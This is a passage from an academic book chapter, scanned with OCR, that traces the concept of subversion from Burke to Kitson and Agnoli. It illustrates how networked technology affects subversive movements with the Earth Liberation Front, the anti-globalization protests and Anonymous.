expression of this trend was al-Qaeda’s attack on New Yorks World 
Trade Center. One decade later, and only across the street in Zuccotti 
Park, yet in many ways on the opposite end of the spectrum, rose the 
Occupy Wall Street movement. The panoply of subversive movements 
in-between includes Arab youth triggering uprisings against despised 
despots, the alter-globalization movement, animal rights activists, ano- 
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nymous hacktivists, and assorted social media-enabled protest move¬ 
ments in Russia, China, Iran, and elsewhere. At first glance these 
phenomena have little in common: some are seen as a righteous force 
for progress and overdue change—others as an expression of perfidy, 
barbarism, and regression. 

Yet at second glance these diverse examples have at least two common 
characteristics to all observers, regardless of their allegiances. The first is 
that they all share the goal of undermining the authority of an existing 
order. Activists in any of these examples may not share one vision of 
what the despised existing order should be replaced by, but they share 
the belief that the establishment should be forced to change its ways, if 
not its constitutional setup. Whether extreme or mainstream, whether 
peaceful or violent, whether legal or criminal, whether progressive or 
regressive, these movements were all subversive. The second common 
characteristic is that all these movements or groups benefited to a certain 
degree from new communication technologies. Taking action seems to 
have been enabled, at least initially, by the newfound ability to send and 
receive information, often interactively and often personal, on platforms 
that were no longer controlled by the very establishment the activists 
were up against, like their country’s mainstream media, state-run or not. 
Whether radical or conventional, whether non-violent or militant, 
whether legitimate or outcast, these movements all had a virtual trait. 1 
This chapter proceeds from the assumption that new subversive move¬ 
ments in a networked twenty-first-century context merit a general dis¬ 
cussion: cyberspace is changing the nature of subversion, both to the 
benefit and to the chagrin of activists and militants. 

Subversion is an old idea that arose in Europe’s own democratic revo¬ 
lutions at the turn of the nineteenth century. Its virtual dimension was 
added only 200 years later, with the emergence of the interactive Inter¬ 
net at the turn of the twenty-first century. The concept is time-tested, 
nimble, and remarkably fruitful: subversion is not necessarily focused on 
violence and counter-force, and may therefore overcome the inadequate 
terminology of victory and defeat. Once subversion is conceptually fles¬ 
hed out, a number of illuminating questions become visible: how is it 
possible to distinguish between regenerative and more radical subver¬ 
sion? When is subversion likely to become violent? And under what 
conditions is subversion likely to lose momentum, peter out, and disap¬ 
pear again? 
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This chapter argues that networked computers and the commoditiza¬ 
tion of consumer electronics have affected subversion in one overarching 
way: the early phases of subversively undermining established authority 
and collective trust require less violence than they did before. Launching 
a subversive “start-up” has therefore become easier—but technology has 
a darker flipside for those attempting to undermine established powers. 
Turning this subversive start-up into a successful insurgent or revolutio¬ 
nary “enterprise” has become more difficult. Technology, in short, has 
lowered the entry costs but raised the threshold for success. 

Pointing out three conceptual strengths of subversion plus three 
hypotheses will outline the argument. The first strength is that the 
notion of subversion is much older and better established than its more 
narrow-minded recent rivals. The second strength is that subversion 
takes the debate beyond a counter-productive focus on violence. The 
concept’s third strength is that it is able to grasp the phenomenon of 
limited goals and motivations. From these rather uncontroversial 
insights follow three more provocative hypotheses, each of which will be 
illustrated with one or more examples of recent subversive movements 
that were influenced by networked communication technology to some 
degree. The first hypothesis is that new technologies have enabled a 
proliferation of subversive causes and ideas, leading to a larger supply of 
subversive ideas, and to a more diversified landscape of subversive entre¬ 
preneurs and start-ups: subversion, in short, has become more cause-driven. 
The second hypothesis holds that new technologies have made it easier 
to join a subversive cause, and they have also made it easier to stop 
subversive activity again: subversion, consequently, is seeing higher levels of 
membership-mobility. The third hypothesis is that technology is enabling 
new forms of global and participant-driven organization—and that has 
made it more difficult for subversive movements to establish organiza¬ 
tional discipline and trust, features that are enabled by what legal theo¬ 
rists call an internal coercive order: Internet-driven subversion, therefore, 
is characterized by lower levels of organizational control. Each of these 
three changes comes with advantages as well as disadvantages for subver¬ 
sives. The balance sheet, and whether the bottom line is red or black, 
may depend on the political environment of the subversive activity, 
whether it takes place in the context of a liberal democracy or under 
authoritarian rule. 

A brief word of caution on methodology is necessary here: the 
examples used to illustrate this chapter’s argument—such as the anti- 
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globalization movement, Anonymous, or online organizations that hel¬ 
ped spark the 2011 Egyptian Revolution—are far more complex subjects 
than the discussion of single instances of malicious programs in previous 
chapters. They are multi-layered social and political phenomena that 
were, to a certain extent, enabled or influenced by technological innova¬ 
tions. And studying social phenomena is often harder than studying 
technology. What follows are therefore mere illustrations and examples 
to demonstrate very specific points, not full-blown case studies. 

Subversion is the deliberate attempt to undermine the trustwor¬ 
thiness, the integrity, and the constitution of an established authority or 
order. The ultimate goal of subversion may be overthrowing a society’s 
established government. But subversive activity often has more limited 
causes, such as undermining and eroding an organization’s or even a 
person’s authority. The modus operandi of subversive activity is eroding 
social bonds, beliefs, and trust in state and other collective entities. The 
means used in subversion may not always include overt violence. One 
common tool of subversive activity is media work, such as writing pam¬ 
phlets and literature, and producing art and film. Naturally, the rise of 
social media and Web 2.0 has greatly facilitated the subversive tactics of 
public outreach. Influencing the loyalties and the trust of individuals 
and uncommitted bystanders provides the vehicle for subversion to take 
place, not influencing technical systems. Human minds are the targets, 
not machines. 

Subversion, as a concept, is much older than insurgency or terrorism. 
Yet for many observers and some contemporary historians it misleadin¬ 
gly conveys a mid-twentieth-century feel. Indeed, the term arose— 
again—in the 1950s and 1960s, when the cold war between the Soviet 
Union and the United States resulted in global proxy conflicts where 
both sides employed all means at their disposal to undermine the 
influence of the other ideological bloc. Subversion was one of those 
means, applied by one state clandestinely against the established order 
in another state. But historically, the heyday of subversion was much 
earlier (Figure 1). 

The concept of subversion came to be used more widely in the 
English language around the time of the French Revolution of 1789 and 
the crushed Irish Rebellion of 1798. Many words alter their meaning 
over the course of time. But subversion did not significantly change its 
meaning. “To make a revolution is to subvert the ancient state of our 
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Figure 1: Semantic rise andfall of the terms “subversion, ” “insurgency, ”and “terro¬ 
rism. ” Source Google Ngram Viewer. 1 


country,” wrote the Irish statesman and orator Edmund Burke in his 
famous conservative manifesto, Reflections on the Revolution in France 
(1790). And he added that “no common reasons are called for to justify 
so violent a proceeding.” 3 It is noteworthy to point out that, for Burke, 
subversion included violent action. The term, like sabotage and espio¬ 
nage, was imported into the English language via the French. It was 
already in widespread use before Paris descended into insurrection, 
mutiny and then civil war in the 1780s. In earlier sources, to subvert was 
to overthrow, to overturn, and to corrupt, said one authoritative dictio¬ 
nary of the English language of 1768. 4 A thesaurus of 1806 gave the 
synonyms: overthrow, destruction, ruin, end. 5 (The term “insurgency” 
was not in common English use at the time and does not appear in 
historic dictionaries.) A book about George III, who reigned in Britain 
in turbulent times from 1760 to 1820, has several fleeting remarks 
about attempts at subversion: of the government, of the state, of the 
constitution, and of the “established faith.” 6 Military jargon had a simi¬ 
lar understanding. One military dictionary of 1810 compiled by Charles 
James, a major in the Royal Artillery Drivers, described subversion as “a 
state of total disorder and indiscipline; generally produced by a neglect 
of small faults at the beginning, and a gradual introduction of every sort 
of military insubordination.” 7 

Over the course of the next century, subversion boomed. Europe’s 
anciens regimes would be unsettled and its populations uprooted again 
and again by rival political ideologies, expressing themselves in agitation, 
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violence, and revolution. By the turn of the century the geopolitical 
balance of power slowly began to shift to the New World, as America’s 
economy bloomed and expanded rapidly. The United States grew into a 
capitalist giant thanks in part to the hard labor of European immigrants 
who filled its factories and mines. Many of these workers had expe¬ 
rienced oppression under Europe’s kings and czars, and they brought 
with them radical and utopian ideologies from Italy, Russia, Germany, 
and France. Not without justification, America’s political establishment 
feared the specter of subversion. “The time of the great social revolutions 
has arrived,” wrote Theodore Roosevelt in 1895. That year the future 
president served as police commissioner in New York City, “We are all 
peering into the future to try to forecast the action of the great dumb 
forces set in operation by the stupendous industrial revolution,” he 
wrote. 8 One year earlier, activists representing one of those dumb 
forces—anarchism—had assassinated the president of France. Several 
heads of state would die at the hands of anarchists over the next six 
years, including Roosevelt’s predecessor as America’s president, William 
McKinley, who was killed in 1901. A little more than a century after 
McKinley’s assassination, it was the stupendous information revolution 
that was again setting in operation great forces that toppled heads of 
states and removed anciens regimes, this time across the Middle East. 
And we are again peering into the future to try to forecast the course of 
action of these subversive forces. 

Subversion is not just older than insurgency. It is important to note 
that subversion is a broader concept than insurgency. The most pro¬ 
minent aspect is that subversion goes beyond violence, that the concept 
has not merely a military meaning, but also a political and philosophical 
one. To date, military writers and security scholars neglect this aspect. 
But for this very reason the security literature is a helpful point of depar¬ 
ture. One useful author on subversion was Frank Kitson, a well-known 
British general who had seen action in the Kenyan Mau Mau Uprising, 
the Malayan Emergency, and in Northern Ireland. Kitson defined sub¬ 
version in a narrow and rather linear way as “all illegal measures short of 
the use of armed force,” 9 essentially as non-violent political crime. A 
subversive campaign of non-violence, Kitson argued, may fall into one 
of three classes: it may be intended as a stand-alone instrument, without 
ever becoming violent; it may be intended to be used in conjunction 
with full-scale insurgency, for instance to divert limited government 
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assets away from another, more violent battle; or subversive action may 
be intended as a phase in a larger progression towards a more intensive 
violent insurrection. 10 Kitson aptly recognized that subversion is much 
broader than insurgency, but like great military writers before him who 
highlighted political aspects of war, he had precious little to say about 
these broader political aspects, let alone the social and cultural aspects. 11 
By defining subversion as illegal yet non-violent, the British general 
maneuvered himself into conceptually murky territory that is difficult 
to reconcile with an open and democratic political order, as will become 
evident shortly. 

Kitson’s narrow take on subversion may be contrasted, for maximum 
effect, with the views of one of his contemporaries, Johannes Agnoli 
(both were born in the mid-1920s). Agnoli was a Marxist professor at 
Freie Universitat Berlin and one of the intellectual forebears of the 1968 
student revolt. In a final lecture series before retirement in 1991, Agnoli 
grandly attempted to draw a positive theory and history of subversion, 
from “paradise” to the French Revolution. 12 Fie depicted Eve as the 
mother of subversion. It was Eve, derived from Adam’s rib, which was in 
turn derived from God, who heard the voice of reason and subverted the 
two layers of hierarchy that had created her. Not God and not Man, but 
the subversive Eve, for the first time, made the step from the uncons¬ 
cious to the conscious, from mythos to logos , from object to subject. 13 
The strongly left-leaning intellectual professor in Berlin was unabashedly 
in favor of subverting the West German government and society in the 
1970s. Yet dismissing Agnoli’s ideas and his impressive analysis would 
be just as naive as some of his radical students probably were. One of the 
professor’s prime questions was the nature of subversion, of “the thing 
itself,” as he called it with awe. Should subversion be understood as 
action, as praxis? Or should it be understood as reflection, as thinking 
about something, about “the conditions that aren’t,” as he quoted from 
Bertold Brecht’s refrain in the 1928 play Dreigroschenoperi u “The utopic 
is always blended into the subversive,” he wrote. 15 He understood utopia 
as a hope toward a better life, as a dream. If there was no utopia, Agnoli 
argued, then the human side of society would disappear. By that he 
meant a humanity that wouldn’t limit itself to pity and merciful phi¬ 
lanthropy, but a humanity that is fighting for its freedom and its hap¬ 
piness. “Those who declare the end of utopia while criminalizing the 
subversive,” Agnoli wrote, “want to prevent the possibility of progress.” 16 
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Refusing such progress and innovation would be “pissing thought,” 17 the 
Berlin professor deadpanned in reference to Hegel. The German idealist 
philosopher once compared the creation of new consciousness 
( Bewufitsein ) and novel thought with siring new life—and staying wit¬ 
hin the boundaries of a used framework with “pissing.” 18 Even after only 
superficially comparing Kitson’s and Agnoli’s ideas, it is easy to see how 
subversion as a broad and overarching political idea appeals more to 
those in favor of change, perhaps even radical change, than to those in 
favor of keeping the social order as it is or as it has been. For Agnoli, 
Kitson’s book must have oozed the smell of stale urine. 

A third aspect is that subversion usually has more limited goals than 
insurgency. Insurgency and revolution are only the most extreme forms 
of subversive activity. And insurgents and revolutionaries, by implica¬ 
tion, have the goal of overthrowing the government and putting in place 
a revolutionary regime. Subversives, by contrast, tend to have more 
limited causes, such as undermining and eroding an organization’s or 
even a person’s authority. The modus operandi of subversive activity is 
eroding social bonds, beliefs, and trust in a government, a company, or 
other collective entities. The means used in subversion may not always 
include overt violence. The vehicle of subversion is always influencing 
the worldviews and loyalties of individuals and uncommitted bystan¬ 
ders, the way they interpret relationships of authority and power vis-a- 
vis their own political, social, and economic situation. The purpose of 
subversion is to make resistance more likely, be it non-violent or violent. 
If violence is used, decision-makers are the prime targets, not technical 
systems. In other words: even when violence, sabotage, or arson is expli¬ 
citly targeted at technical installations or property, not people, it is the 
mind and the cost-benefit calculations of politicians, owners, managers, 
or consumers that is the actual target of such attacks. 

A subversive movement may fail to progress and mature into a full- 
fledged insurgent group not for lack of strength, but for lack of inten¬ 
tion, even when some more extreme members and cells resort to 
systematic violence. Activists may simply not want to make revolution. 
Indeed, historical examples of regime change or revolution through 
non-violent subversion alone are extraordinarily rare. 19 Again it is useful 
to consider Kitson, who aptly pointed out that the goal of subversion 
may either be overthrowing an established economic or governmental 
order—or “to force them to do things they do not want to do.” 20 The 
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first objective is revolutionary and existential; the second objective is 
evolutionary and pragmatic. Here one of the main defining features of 
subversion becomes visible. The objective of insurgency is always to 
overthrow an existing order, nothing less. The objective of a subversive 
movement is attempting to change an organization’s behavior, but not 
attempting to overthrow an existing order. Subversion, in short, can be 
limited to forcing those in power to do things they do not want to do, 
rather than to force them out. Yet radical activists may well resort to 
systematic violence. Subversion can therefore take two principal forms: 
it may be intended as a non-violent prelude to insurrection and revolu¬ 
tion, or it may evolve into a campaign with a non-revolutionary dyna¬ 
mic, be it violent or non-violent. 21 

A good example of this logic of limited ambitions is the Earth Libe¬ 
ration Front (ELF), a well-established and influential subversive move¬ 
ment originally based mainly in Britain and the United States, but with 
some activists scattered across the globe. The ELF illustrates that even 
an amorphous group without leadership and hierarchy can limit its goals 
as well as its tactics, in this case to violence against inanimate objects. 

The Earth Liberation Front was launched in 1992 in Brighton, 
England, as an offshoot of the larger movement “Earth First!” The ELF 
had its most active phase in the mid-2000s. The elves, as its members 
affectionately referred to themselves, engaged in ecotage, a pun on sabo¬ 
tage. The movement initially benefited from academic participation, 
with book authors and scholars mobilizing for the elves’ cause. 22 The 
movement—dubbed “eco-terrorism” by its critics—had a clear ideology 
and a powerful cause: defending the planet and stopping the exploita¬ 
tion and destruction of the natural environment. The destruction of the 
environment, the ELF’s propaganda reasoned, was driven by the pursuit 
of monetary gain, by corporations and by the governments that allow 
these corporations to continue. In principle, this cause spoke to a very 
large constituency in many countries. The ELF’s amorphous organiza¬ 
tional form reflected its potentially broad appeal. The movement relied 
on a leaderless resistance model with “no discernable organizational 
structure,” one of the most detailed academic studies of the “elves” poin¬ 
ted out. 23 The activists’ website says it is an “international, underground 
movement consisting of autonomous groups of people.” The radical 
green activists formed a cell structure, based on a shared ideology, but 
not much more. Activists remained largely unknown to each other. Ins- 
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tead of relying on clear lines of command and internal discipline, the 
movement relied on members “who understand the organization’s goals 
and orientation to take action on their own initiative.” 24 The organiza¬ 
tion operated with “no central leadership, no hierarchy, no membership 
databases, but a rather strict adherence to a set of very basic guide¬ 
lines.” 25 These rules were three in number. The first was to educate the 
public on the “atrocities” committed against the environment and all the 
species that cohabitate in it. This amounted to a built-in reminder not 
to forget to market the cause. The second rule concerned the use of 
violence and specific targets, “to inflict maximum economic damage” on 
all those who profit from environmental destruction. 

The third guideline was especially noteworthy: to take “all necessary 
precautions against harming any animal—human or non-human.” 26 
Taking these rules seriously means limiting the form of activism to eco¬ 
nomic damage, not damage in life. The elves are known to have staged 
attacks in more than a dozen countries. Violent attacks have targeted 
developers, logging companies, those engaged in genetic engineering 
research, ski resorts, and even SUV dealerships. The amount of property 
damage caused by the radical environmentalists is remarkable. 27 In the 
five-year period between 1996 and 2001, one of the movement’s cells, 
called “The Pamily,” inflicted damages as high as $80 million against 
federal land and animal management sites, meat-packing plants, lumber 
facilities, and car dealerships. The cell’s most high-profile “direct actions” 
were a $ 12-million arson at the Vail Ski Resort in Colorado in 1998 and 
the sabotage of a high-tension power line near Bend, Oregon, in the 
following year. Since 1997, the Earth Liberation Front claims to have 
inflicted damage totaling well over $150 million worldwide. Yet, “in the 
history of the ELF internationally no one has been injured from the 
group’s actions and that is not a coincidence,” as the group’s Frequently 
Asked Questions point out. 28 The elves took care to walk a fine but 
clearly demarcated line: labs, research facilities, and company infrastruc¬ 
ture were legitimate targets, while workers and managers were not: “we 
want a lot of people watching, not a lot of people dead.” 29 

The ELF, like many subversive movements that gravitate towards 
violence, is a highly diverse and fractured movement. This effect is 
enhanced by the movement’s non-hierarchical setup as well as by an 
absence of consensual decision-making, in contrast to Earth First! There 
are, therefore, more radical streaks within the movement that embraced 
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revolutionary rhetoric, albeit without attempting to turn the revolutio¬ 
nary vision into reality. 30 By and large, the ELF seems to be subversive 
and to have embraced violence against property—but at the same time 
the movement is limited; it is subversive but not revolutionary, and its 
violence carefully avoids targeting human beings. Radical environmen¬ 
talism and the ELF predate the broad use of the Internet, and in contrast 
to other subversive movements it was not enabled by new technologies. 
But new technologies drastically enhanced one feature that the elves also 
grappled with: diverse causes. 

The more technologically sophisticated a subversive movement and 
its targeted constituencies, the more cause-driven it is likely to become. 
One of the key drivers behind this dynamic is collective emotion. The 
concept of “cyber war” is inept and imprecise. But other classic concepts 
of the study of war retain their relevance and pertinence for the study of 
cyber offenses. Clausewitz, and many other strategic thinkers, consis¬ 
tently highlighted the role of passions and emotions in conflict, be it 
regular or irregular conflict. “The intensity of action,” Clausewitz obser¬ 
ved, “is a function of the motive’s strength that is driving the action.” 
That motive may be a rational calculation or it may be emotional indi¬ 
gnation (Gemutserregung ), he added. “If power is meant to be great, the 
latter can hardly be missing.” 31 Subversion, like insurgency, is driven by 
strong motives that mobilize supporters, volunteers, and activists and, if 
violence comes into play, justify why fighters and insurgents would take 
up arms and possibly kill civilians. Another revered military thinker, 
David Galula, described the driving force behind an insurgent group as 
the cause. An insurgency’s treasure would be a “monopoly of a dynamic 
cause,” wrote the French expert of counterrevolutionary war in the 
1960s. 32 But fifty years later, the demise of grand ideologies 33 and the 
rise of highly networked movements have altered the logic of dynamic 
causes. Rather than grand narratives, it is highly specific issues that are 
likely to mobilize a critical mass of enraged activists, if only temporarily. 
This dynamic has a flipside: the monopoly over a dynamic cause is 
replaced by a dynamic market of causes. Individuals and small groups 
may join a movement for their own individual reasons. These individual 
causes may have a strong emotional draw, but that benefit comes at the 
cost of coordination, coherence, and unity. 

Perhaps the most insightful example of cause-driven subversion is the 
rise and decline of the anti-globalization movement, a left-leaning inter- 
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national protest movement that climaxed at the turn of the twenty-first 
century. Globalization became a widely used buzzword in the early 
1990s. For many, globalization was equivalent to economic globalization. 
And economic globalization soon stood for the increasing liberalization 
of goods and services, unfettered capitalism, the power of multinational 
corporations, and regimes of global governance put in place to perpe¬ 
tuate a system that seemed unjust and oppressive to many. The globali¬ 
zation critics identified the World Trade Organization, the International 
Monetary Fund, and the World Bank as their main targets, along with 
a much-hated multilateral agreement on investment, the MAI. The anti¬ 
globalization movement understood itself as a counter-ideology. Globa¬ 
lization from above, as some activists saw it, needed to be resisted by 
globalization from below. 

Initially, the movement was driven by the excitement of large, inter¬ 
national protest events. One of the most visible founding events, the 
Carnival Against Capital, was held in Cologne, Germany, on 18 June 
1999, and is therefore known as “J18”. Simultaneous events in the City 
of London and Oregon helped galvanize international media attention. 
The international day of protest had the rallying cry, “Our resistance is 
as transnational as capital.” 34 Perhaps the most memorable event in the 
short history of the anti-globalization movement was a march on Seattle 
in November and December 1999. The magnet for the protest was a 
World Trade Organization ministerial conference. Approximately 
50,000 people took to the streets of downtown Seattle, a mid-size city 
of 600,000. On the morning of a cold and rainy Tuesday, 30 November, 
the “Battle of Seattle” began to unfold. The large number of demonstra¬ 
tors caught the city’s security agencies off-guard and effectively shut 
down the conference by blocking the Seattle Convention Center. The 
police resorted to tear gas, rubber bullets, and mass arrests. “N30,” as 
the November day is known among protesters, became symbolic for the 
anti-globalization movement and helped mobilize follow-on events. 

Two things leaped to the eye. The first was the movement’s diversity. 
N30 did not just catch the authorities off-guard; it also caught those 
with a subversive agenda off-guard. The diversity of this early twenty- 
first-century phenomenon surprised even the organizers. At the time 
Carl Pope was the executive director of the Sierra Club, America’s oldest 
grassroots environmental organization founded in 1892. “From my pers¬ 
pective, and I came out of the ‘60s, Seattle was the first time when you 
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saw multi-generation, multi-class, and multi-issue in the streets 
together,” Pope told Time magazine shortly after Seattle. 35 The banner of 
“anti-globalization” seemingly united a motley crew of activists: environ¬ 
mentalists of various shades, animal rights activists, union members, 
human rights advocates, anarchists of different stripes, even participants 
from the White supremacist scene. More than 600 groups, out of a total 
15,000 participants, converged on Washington, D.C. in April 2000 in 
an event known as A16. The groups ranged from Greenpeace, one of the 
most established groups, to the Third Position, a curious mix of anar¬ 
chist left and right positions and one of the more violent outfits. 36 The 
combination of such a sundry set of small groups into a larger movement 
resulted in a swirl of media attention and political responses. This visibi¬ 
lity, in turn, created an impression of power that far exceeded what any 
single group could accomplish. CSIS, the Canadian intelligence service, 
summed up this dynamic in a report published shortly after Seattle: 

The melding of the various groups into one large body implies power, and 
attracts attention and publicity, which, in turn, draws more and more 
participants. Many groups and individuals take part largely because of the 
ensuing attention and publicity, almost in the manner of self-generating 
growth . 37 

Some groups united under the anti-globalization umbrella frequently 
changed their names. Also, individual activists may have been members 
of more than one group or changed membership as a group stopped 
operating for one reason or the other. It was not the mode of organiza¬ 
tion that matters most, but the underlying psychological forces of acti¬ 
vism, “Of more importance are the causes and motivations per se,” the 
Canadian intelligence analysts observed. The activists’ positive visions 
and ideals included fairer trade, more organic products, improved labor 
conditions in developing countries, corporate social responsibility, 
advancements of human rights, green energy, sustainable development, 
global justice, gay rights, feminism, and more. 

But this diversity had a thorny side-effect: it diluted the movement. 
More causes meant less content. The result was empty slogans. “Another 
world is possible” was the motto of Porto Alegre, Brazil, where the first 
World Social Forum was held in late January 2001. For a few years, the 
meetings became counter-events to the World Economic Forum in 
Davos, Switzerland, which the critics saw as the embodiment of global 
capitalism. In Porto Alegre, various committees approved a so-called 
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charter of principles later in 2001. The meeting, the charter said, was a 
place for: 

groups and movements of civil society that are opposed to neo-liberalism 
and to domination of the world by capital and any form of imperialism, 
and are committed to building a planetary society directed towards fruit¬ 
ful relationships among Mankind and between it and the Earth . 38 

This statement was so general and broad as to be nearly meaningless. 
But its authors had little choice. The principles expressed in the docu¬ 
ment needed to be all-inclusive in order to offer a roof to anybody who 
self-identified with what had become a global network of protest. Buil¬ 
ding a planetary society and organizing for fruitful relationships among 
mankind and the earth seemed to do the trick. This leads to the second 
noteworthy feature. 

The rise of the popular anti-globalization network curiously coincided 
with the rise of another popular global network: the Internet. Many activ¬ 
ists, young and with experimental lifestyles, were early technology adop¬ 
ters. Naturally, they suspected a correlation between the new technologies 
and the new ideas they embraced so passionately. One example is Evan 
Henshaw-Plath, founder of the then-popular site http://protest.net. 
Shortly after Christmas 2001, Elenshaw-Plath gave an interview to a 
graduate student. He commented on the relationship between the web 
and the movement, and mused that the former had enabled the latter: 

The anti-globalization movement could not exist without the Internet. 
This is not to say that we wouldn’t be struggling over similar issues but the 
movement that we have now wouldn’t exist. We wouldn’t be making the 
connections and coalitions. We couldn’t organize such massive coalitions 
with almost non-existent overhead if we didn’t have email mailing lists and 
websites. I think the tactics of having very large broad protests with indy- 
media centers, conference spaces, counter conferences, legal protests, 
illegal protests, and direct action wouldn’t be possible without the net . 39 

Henshaw-Plath probably overstated the point. The anti-globalization 
movement could probably exist without the Internet. The question was 
how the new media affected political activism. That question, how the 
global Internet impacted on the anti-globalization movement, naturally 
became a sexy topic for sociologists and political scientists, many of 
whom at least sympathized with the protesters. 40 One assumption was 
that the new media facilitated participation, “Political action is made 
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easier, faster and more universal by the developing technologies,” one 
widely read article argued in 2002. New information technologies 
would “lower the costs and obstacles of organizing collective action 
significantly.” 41 By following simple yet detailed guidelines, the article 
continued, “all supporters can easily become real participants.” 42 The 
dotcom bubble, it seemed, had not burst in academia, where enthusiasm 
for the positive and possibly revolutionary impact of new information 
technologies refused to go away. 43 The Internet, many sociologists 
argued, enabled a collective identity, effective mobilization of partici¬ 
pants, and the ability to network the organizations into a larger move¬ 
ment that would be more reactive as a result. Until the early 1990s, big 
hierarchical groups had a “fundamental” advantage, another prominent 
article argued in 2006. But by then, a decade later, the comparative 
advantage had shifted. “In the Internet age, the transaction costs of 
communicating to large audiences, of networking, and of working trans- 
nationally have diminished,” wrote one World Bank-based researcher 
about the anti-globalization movement, “while the advantages of 
nimbleness—of being able to respond swiftly to events as they unfold— 
have grown.” 44 As entry costs and organizational costs are lowered, new 
entrants, groups outside the establishment of public institutions, such 
as parties, labor organizations, or unions, would benefit most in relative 
terms. By 2006, Twitter was founded and Facebook had opened to the 
public. The web continued to inspire entrepreneurs, politicians, acade¬ 
mics, and activists. Social media had lowered the cost of organizing 
collective action, thus drastically increasing the number of people who 
would actively contribute to society and politics, and not just passively 
consume information as “couch potatoes,” a prominent web evangelist, 
Clay Shirky, argued in 2010. 45 But by then the anti-globalization move¬ 
ment had again outpaced sociological scholarship: the movement, des¬ 
pite its “fundamental advantage,” had quietly disappeared from the 
planetary stage. By the end of the 2000s, a decade after the Battle of 
Seattle, the fighters for global justice had scattered—this did not happen 
despite the rise of the Internet, but at least partly because of the rise of the 
Internet. To understand why, another subtle change of twenty-first-cen¬ 
tury subversion has to be considered. 

These considerations about a proliferation of small causes lead to the 
second hypothesis: the more a subversive movement relies on multiple 
causes, new technologies, and networked communications, the more 
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likely it is that this movement will be characterized by high membership 
mobility. At closer examination, several factors that go beyond the 
attractiveness of a dynamic cause increase the number and the frequency 
of members joining a new movement: the ease of Ending out about the 
movement and its cause; the opportunity to participate at low costs; and 
the benefits of participation. One overarching factor, by contrast, is 
likely to determine whether participants terminate their subversive acti¬ 
vity, independent of success or failure: the costs of ending the participa¬ 
tion and leaving the “movement.” Of course other considerations 
influence an individual’s decision to continue supporting a subversive 
cause, for instance whether the movement is making progress, whether 
it has achieved any results, whether participation pays off in one way or 
the other, or whether there are other competing movements or better 
ways to make a difference. But all these motivations are contingent on 
the costs of leaving. In some cases, the increased ease of temporarily 
joining a movement and leaving that movement again represents a hard 
challenge to the leaders and organizers of subversive action. 

An insightful example of high membership mobility is Anonymous, 
a loose and largely leaderless movement of activists that became visible 
to the larger public in 2008. The movement’s activities initially took 
place only online. These activities could be legal or illegal, for instance 
hacking into protected computer networks. But Anonymous’s activities 
remained entirely non-violent, in contrast to its brick-and-mortar pre¬ 
decessors like the ELL or the anti-globalization movement. Supporters 
concealed their identities and rallied around self-defined causes, often 
promoting free speech, agitating against censorship and government 
oppression. The movement’s motto was frequently posted at the end of 
announcements: We are Anonymous. We are Legion. We do not forgive. We 
do notforget. Expect us. By late 2010, Anonymous had become to protest 
what Wikipedia was for encyclopedias and Linux for software; an 
improved, open, and crowd-produced alternative: nimble and effective 
to the point of appearing dangerous to the establishment. That, at least, 
is how enthusiastic sympathizers and frightened critics alike saw the 
phenomenon. By mid-2011, Anonymous seemed to have peaked. A 
closer look at this curious movement exposes three tender spots that are 
of general interest for the study of subversive social movements. 

The first feature is the movement’s internal fissures and contradic¬ 
tions. Anonymous has, in simplified terms, two main streaks that reflect 
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the movement’s lopsided rise: crude entertainment and political acti¬ 
vism. Anonymous initially rose from the raunchy online message board 
4chan, an online platform and image board with forced anonymity 
visited by more than 20 million unique visitors a month. The original 
activists were in it for the laughs, the “lulz.” Lulz is a concept related to 
Schadenfreude, derived from a plural of “lol,” which stands for laugh- 
out-loud. 46 An example was Anonymous’s “YouTube porn day,” a 
concerted prankster raid on 20 May 2009 where hundreds of pornogra¬ 
phic videos were defiantly uploaded to the popular video-sharing site to 
retaliate against Google’s removal of music videos. 47 In a video titled 
“Jonas Brother Live On Stage,” a viewer commented: “I’m 12 years old 
and what is this?” The phrase, quoted in a BBC story, went on to 
become an Internet meme. Such trolling didn’t need to have any social 
or political dimension. It could just be crude and mean and entertai¬ 
ning. For instance “doxing” an innocent victim by hacking or tricking 
him or her and then posting embarrassing private pictures, ideally of 
body parts, on lb/, 4chan’s most popular and unmoderated forum, or 
on the victim’s Facebook wall, for family and friends to see. 48 

On the other side of that internal divide are those who are genuinely 
driven by a political cause. Those who disagree with the ethics of this or 
that prank are called “moralfags” on /b/. This slur is also applied to 
politically motivated activism. One of the early major campaigns 
became known as “Project Chanology.” The op’s name was a portman¬ 
teau of 4chan and the name of the target, the Church of Scientology. 
Chanology was triggered by Scientology’s attempt to get YouTube to 
remove a weird promotional video with Tom Cruise that had allegedly 
been leaked and edited. Anonymous initially reacted with DDoS attacks 
on Scientology’s website, but it soon expanded the campaign. The Inter¬ 
net collective launched the operation publicly with its own YouTube 
video on 21 January 2008. 49 The high point of the Anonymous cam¬ 
paign was the wave of demonstrations that took place in front of the 
sect’s main centers worldwide. The protesters wore the now-famous Guy 
Fawkes masks, adopted from the film Vfor Vendetta. The global turnout 
on 10 February 2008 may have been as high as 8,000 protesters. The 
campaign was widely covered in the international press. “Oh fuck” one 
famous photo of a group of anti-Scientology protesters read, “The Inter¬ 
net is here.” Scientology noticed that the Internet was here in unexpec¬ 
ted ways: by receiving large numbers of unpaid pizzas, black faxes to 
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drain printer cartridges, unwanted taxis, and prank calls. Some of the 
lulzy operations had a shallow political dimension, as the YouTube-porn 
day illustrates, and some of the political activism has retained an amu¬ 
sing side, as the Chanology shows. This mix was a recipe for success, and 
temporarily bridged the internal divide among the “Anons.” 

The second feature is the movement’s low internal visibility. In late 
November 2010, the crowd on 4chan’s Ibl board was again jolted into 
action. After WikiLeaks published secret US diplomatic cables, PayPal 
and other financial firms announced that they would block payments to 
the whistleblowing start-up. Anonymous staged a few high-profile 
DDoS attacks in defense of Julian Assange’s outfit, most notably against 
PayPal, Visa, and Postfinance, a leading Swiss bank. Operation Payback, 
as it was known, received wide attention in the international press and 
Anonymous’s channels on Internet Relay Chat, better known by its 
acronym IRC, were brimming with new members. A number of follow- 
on operations, most notably the hacking of HBGary Pederal, further 
increased the group’s visibility. Policy-makers began to be concerned 
about the dangerous hacker collective. Scholars and PhD students star¬ 
ted dissecting the phenomenon. Books were published. 50 But this high 
public visibility of Anonymous contrasted sharply with a low internal 
visibility for those who decided to participate in its activities. A multi¬ 
tude of platforms, IRC channels, changing pseudonyms, and simulta¬ 
neous communication in high volumes made understanding what was 
going on a challenge. Anonymous activists, naturally, remain anony¬ 
mous—also amongst each other. This lack of visibility means that par¬ 
ticipants may not know how many people join an operation, why they 
join an operation, and most importantly who they really are. This situa¬ 
